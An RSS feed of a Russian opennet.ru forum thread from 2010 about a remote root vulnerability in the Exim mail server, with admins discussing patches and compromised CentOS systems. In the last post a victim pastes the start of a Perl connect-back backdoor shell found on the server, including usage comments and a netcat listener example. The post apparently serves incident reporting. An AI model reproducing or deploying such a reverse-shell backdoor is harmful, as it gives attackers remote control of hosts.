<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: В Exim обнаружена критическая уязвимость, позволяющая получи...</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html</link>
    <description>В популярном почтовом сервере Exim найдена (http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html) критическая уязвимость, позволяющая удаленному злоумышленнику выполнить свой код на сервере с привилегиями суперпользователя. Уязвимость была выявлена в результате анализа причин взлома одного из серверов. Проанализировав собранный при помощи tcpdump слепок трафика на момент взлома, было выявлено, что взлом был произведен через определенным образом оформленный в секции &quot;DATA&quot; сверхбольшой блок данных, содержащий в своем теле блок &quot;HeaderX: $&#123;shell-код&#125;&quot;. &lt;br&gt;&lt;br&gt;&lt;br&gt;С целью предотвращения волны проведения атак, до выпуска обновления представлено только общее описание атака, детали не разглашаются. Так как в определенных кругах подробности с методом эксплуатации данной проблемы уже известны, всем администраторам рекомендуется временно заблокировать работу почтового сервера или  переконфигурировать (http://www.exim.org/exim-html-3.20/doc/html/spec_55.html) Exim для работы под неприви...&lt;br&gt;&lt;br&gt;URL: http://www.exi</description>

<item>
    <title>В Exim обнаружена критическая уязвимость (дополнено - пробле... (Начинающий)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html#127</link>
    <pubDate>Mon, 10 Jun 2019 18:36:17 GMT</pubDate>
    <description>Вопрос к профессионалам от Нуба&lt;br&gt;Можно ли защититься от этой проблемы косвенным образом.&lt;br&gt;Чтобы не перехватили root - Поставить при авторизации  запрет на доступ для всех по IP кроме одного своего ?&lt;br&gt;</description>
</item>

<item>
    <title>В Exim обнаружена критическая уязвимость, позволяющая получи... (Viliar)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html#126</link>
    <pubDate>Thu, 23 Dec 2010 15:30:33 GMT</pubDate>
    <description>&amp;gt; Ну а я считаю, что он прав. Насчет криворукости того админа тоже. &lt;br&gt;&amp;gt; Не сочтите за флуд, но у меня почтовик(Exim) обслуживает 15 доменов &lt;br&gt;&amp;gt; и рассылку(почти 400 000 писем в день). Ни разу за 5 &lt;br&gt;&amp;gt; лет не было нареканий по поводу его работы. О &quot;buffer overflow&quot; &lt;br&gt;&amp;gt; вообще только в сказках слышал.&lt;br&gt;&lt;br&gt;Очевидно, что Вам&lt;br&gt;a) Повезло&lt;br&gt;b) Changelog&apos;и Вы ну совсем не читаете.&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>В Exim обнаружена критическая уязвимость (дополнено - пробле... (Аноним)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html#125</link>
    <pubDate>Sun, 19 Dec 2010 00:11:13 GMT</pubDate>
    <description>&amp;gt; также систему на centos поломали. есть ли версия 4.70 exim.x86_64 для centos?? &lt;br&gt;&lt;br&gt;Для CentOS вышло обновление. Это не 4.70, но уязвимость там пофикшена.&lt;br&gt;</description>
</item>

<item>
    <title>В Exim обнаружена критическая уязвимость (дополнено - пробле... (pasha)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html#124</link>
    <pubDate>Thu, 16 Dec 2010 12:45:12 GMT</pubDate>
    <description>ещё и dovecot накрылся(( вся входящая почта пропала и новые письма не приходят( это только у меня такой эффект вышел?&lt;br&gt;</description>
</item>

<item>
    <title>В Exim обнаружена критическая уязвимость (дополнено - пробле... (pasha)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html#123</link>
    <pubDate>Thu, 16 Dec 2010 11:49:44 GMT</pubDate>
    <description>также систему на centos поломали. есть ли версия 4.70 exim.x86_64 для centos??&lt;br&gt;</description>
</item>

<item>
    <title>В Exim обнаружена критическая уязвимость, позволяющая получи... (Аноним)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html#122</link>
    <pubDate>Wed, 15 Dec 2010 04:41:04 GMT</pubDate>
    <description>&amp;gt;&#091;оверквотинг удален&#093;&lt;br&gt;&amp;gt;&amp;gt; HeaderX &lt;br&gt;&amp;gt;&amp;gt; http://www.exim.org/lurker/message/20101209.112914.68af6769.en.html &lt;br&gt;&amp;gt; В Дебиане уже все пофикшено.&lt;br&gt;&amp;gt; exim4 (4.69-9+lenny1) stable-security; urgency=high &lt;br&gt;&amp;gt;   * Non-maintainer upload by the Security Team.&lt;br&gt;&amp;gt;   * Fix SMTP file descriptors being leaked to processes invoked &lt;br&gt;&amp;gt; with $&#123;run...&#125; &lt;br&gt;&amp;gt;   * Fix memory corruption issue in string_format(). CVE-2010-4344 &lt;br&gt;&amp;gt;   * Fix potential memory pool corruption issue in internal_lsearch_find().&lt;br&gt;&amp;gt;  -- Stefan Fritsch &amp;lt;sf&#064;debian.org&amp;gt;  Fri, 10 Dec 2010 13:25:07 +0100 &lt;br&gt;&lt;br&gt;Это должно было бы пофиксено два Exim&#096;овскиз релиза назад, а не когда за яйца уже схватили!!!!!!!!! Обновления безопасности же наверно не так просто выходят, а?&lt;br&gt;</description>
</item>

<item>
    <title>В Exim обнаружена критическая уязвимость, позволяющая получи... (Аноним)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html#121</link>
    <pubDate>Wed, 15 Dec 2010 04:39:15 GMT</pubDate>
    <description>Переставить систему&lt;br&gt;</description>
</item>

<item>
    <title>В Exim обнаружена критическая уязвимость, позволяющая получи... (lissyara)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html#120</link>
    <pubDate>Tue, 14 Dec 2010 21:46:41 GMT</pubDate>
    <description>&amp;gt;&amp;gt;&amp;gt; 4) Если бы все было так просто как вы написали - не &lt;br&gt;&amp;gt;&amp;gt;&amp;gt; заморачивались бы рейд вендоры BBU, а вендору БД - ACID транзакциями.&lt;br&gt;&amp;gt;&amp;gt;&amp;gt; Для меня вот - потеря спула является критичным фейлом, так как &lt;br&gt;&amp;gt;&amp;gt;&amp;gt; при этом потеряется огромное количество писем и я даже не смогу &lt;br&gt;&amp;gt;&amp;gt;&amp;gt; сказать что именно было потеряно.&lt;br&gt;&amp;gt;&amp;gt; для меня - тока в одном месте эта потеря являтся критической.&lt;br&gt;&amp;gt;&amp;gt; но там /var отдельно.&lt;br&gt;&amp;gt; ууу... еще и вар не отдельной фс, как все печально у вас, &lt;br&gt;&amp;gt; однако.&lt;br&gt;&lt;br&gt;та. последнее время стал старый и ленивый, и балуюсь таким&lt;br&gt;&lt;br&gt;srv0$ df -h&lt;br&gt;Filesystem             Size    Used   Avail Capacity  Mounted on&lt;br&gt;/dev/label/rootFS       15G    5.0G    8.4G    37&#037;    /&lt;br&gt;devfs                  1.0K    1.0K      0B   100&#037;    /dev&lt;br&gt;/dev/label/homeFS      117G     49G     58G    46&#037;    /home&lt;br&gt;tmpfs                  7.0G    620K    7.0G     0&#037;    /tmp&lt;br&gt;linprocfs              4.0K    4.0K      0B   100&#037;    /proc&lt;br&gt;</description>
</item>

<item>
    <title>В Exim обнаружена критическая уязвимость, позволяющая получи... (mega4el)</title>
    <link>https://opennet.ru/openforum/vsluhforumID3/73190.html#119</link>
    <pubDate>Tue, 14 Dec 2010 17:04:53 GMT</pubDate>
    <description>Блин, поломали. &lt;br&gt;Стоит CentOS release 5.4 (Final) с exim 4.63-3.el5. Залили в /tmp/c.pl какой-то бэкдор:&lt;br&gt;cat /tmp/c.pl&lt;br&gt;#!/usr/bin/perl&lt;br&gt;use IO::Socket;&lt;br&gt;#   Priv8 ** Priv8 ** Priv8&lt;br&gt;# IRAN HACKERS SABOTAGE Connect Back Shell&lt;br&gt;# code by:LorD&lt;br&gt;# We Are :LorD-C0d3r-NT-&#092;x90&lt;br&gt;# Email:LorD&#064;ihsteam.com&lt;br&gt;#&lt;br&gt;#lord&#064;SlackwareLinux:/home/programing$ perl dc.pl&lt;br&gt;#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--&lt;br&gt;#&lt;br&gt;#Usage: dc.pl &#091;Host&#093; &#091;Port&#093;&lt;br&gt;#&lt;br&gt;#Ex: dc.pl 127.0.0.1 2121&lt;br&gt;#lord&#064;SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121&lt;br&gt;#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--&lt;br&gt;#&lt;br&gt;#&#091;*&#093; Resolving HostName&lt;br&gt;#&#091;*&#093; Connecting... 127.0.0.1&lt;br&gt;#&#091;*&#093; Spawning Shell&lt;br&gt;#&#091;*&#093; Connected to remote host&lt;br&gt;&lt;br&gt;#bash-2.05b# nc -vv -l -p 2121&lt;br&gt;#listening on &#091;any&#093; 2121 ...&lt;br&gt;#connect to &#091;127.0.0.1&#093; from localhost &#091;127.0.0.1&#093; 32769&lt;br&gt;#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--&lt;br&gt;#&lt;br&gt;#--==Systeminfo==--&lt;br&gt;#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39</description>
</item>

</channel>
</rss>
